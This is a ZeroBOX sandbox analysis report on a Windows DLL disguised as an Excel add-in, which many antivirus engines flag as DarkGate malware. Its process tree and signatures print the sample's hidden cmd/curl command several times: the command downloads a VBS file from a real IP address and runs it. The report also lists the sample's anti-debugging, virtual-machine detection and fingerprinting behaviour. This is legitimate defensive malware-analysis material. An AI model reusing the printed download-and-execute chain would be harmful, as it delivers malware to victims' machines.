Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 23, 2023, 6:56 p.m.	Sept. 23, 2023, 6:58 p.m.

Size	50.0KB
Type	PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
MD5	`f1b91fdbcd062031687e2766ab6773b6`
SHA256	`305de78353b0d599cd40a73c7e639df7f5946d1fc36691c8f7798a99ee6835e7`
CRC32	`50181CE7`
ssdeep	`1536:dZq2U5JsS6Nh5wFXscKjrtN/5zqGyiNwmHWR03VY:S9HQNh5wFXscKXHRzaiNnVFY`
Yara	PE_Header_Zero - PE File Signature IsDLL - (no description) IsPE64 - (no description) Generic_Malware_Zero - Generic Malware

rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\aa.xll.exe.dll,xlAutoOpen
2560
- rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\aa.xll.exe.dll,xlAutoOpen
  2792
  - me.exe C:\Users\Public\me.exe about:"<script>var b = new ActiveXObject("wscript.shell"); b.run('cmd /c C:\\Windows\\system32\\curl.exe -o c:\\users\\public\\1.vbs http://5.42.76.197/Epv2pum/123&&timeout 10&&c:\\users\\public\\1.vbs', 0); window.close();</script>"
    2908
    - cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\system32\curl.exe -o c:\users\public\1.vbs http://5.42.76.197/Epv2pum/123&&timeout 10&&c:\users\public\1.vbs
      908
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\aa.xll.exe.dll,xor_decrypt
2644
- rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\aa.xll.exe.dll,xor_decrypt
  2832
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\aa.xll.exe.dll,
2736

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 23, 2023, 6:56 p.m.			0	0
IsDebuggerPresent Sept. 23, 2023, 6:56 p.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Sept. 23, 2023, 6:56 p.m.	buffer: 'C:\Windows\system32\curl.exe' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x000000000000000b	1	1	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 23, 2023, 6:56 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (3 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Sept. 23, 2023, 6:56 p.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 23, 2023, 6:56 p.m.	process_identifier: 2832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 23, 2023, 6:56 p.m.	process_identifier: 2908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\curl.exe -o c:\users\public\1.vbs http://5.42.76.197/Epv2pum/123&&timeout 10&&c:\users\public\1.vbs

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Sept. 23, 2023, 6:56 p.m.	show_type: 0 filepath_r: cmd parameters: /c C:\Windows\system32\curl.exe -o c:\users\public\1.vbs http://5.42.76.197/Epv2pum/123&&timeout 10&&c:\users\public\1.vbs filepath: cmd	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 23, 2023, 6:56 p.m.	process_identifier: 2908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x000007fffff90000 process_handle: 0xffffffffffffffff	1	0	0

File has been identified by 37 AntiVirus engines on VirusTotal as malicious (37 events)

Bkav	W32.AIDetectMalware.64
Lionic	Trojan.Win32.Alien.4!c
MicroWorld-eScan	Trojan.GenericKD.69405985
FireEye	Trojan.GenericKD.69405985
McAfee	Artemis!F1B91FDBCD06
Malwarebytes	Trojan.DarkGate
Arcabit	Trojan.Generic.D4230D21
Cyren	W64/ABRisk.NHKN-7036
Symantec	Trojan Horse
ESET-NOD32	a variant of Win64/Agent.CWT
Cynet	Malicious (score: 99)
Kaspersky	Trojan.Win64.Alien.bzk
BitDefender	Trojan.GenericKD.69405985
Avast	MalwareX-gen [Trj]
Sophos	Mal/Generic-S
F-Secure	Trojan.TR/Agent.uutvu
VIPRE	Trojan.GenericKD.69407119
TrendMicro	Trojan.Win64.DARKGATE.YXDIVZ
McAfee-GW-Edition	BehavesLike.Win64.Infected.qm
Emsisoft	Trojan.GenericKD.69405985 (B)
Webroot	W32.Trojan.Gen
Avira	TR/Agent.uutvu
Antiy-AVL	Trojan/Win64.Alien
Microsoft	Trojan:Win64/Tedy.GPB!MTB
ZoneAlarm	Trojan.Win64.Alien.bzk
GData	Trojan.GenericKD.69405985
Google	Detected
AhnLab-V3	Dropper/Win.Generic.R606770
ALYac	Trojan.GenericKD.69407119
MAX	malware (ai score=88)
Cylance	unsafe
Panda	Trj/Chgt.AD
TrendMicro-HouseCall	Trojan.Win64.DARKGATE.YXDIVZ
Rising	Downloader.Agent!8.B23 (TFE:6:OmxMTTXvMrN)
Ikarus	Win32.Outbreak
AVG	MalwareX-gen [Trj]
DeepInstinct	MALICIOUS

aa.xll.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All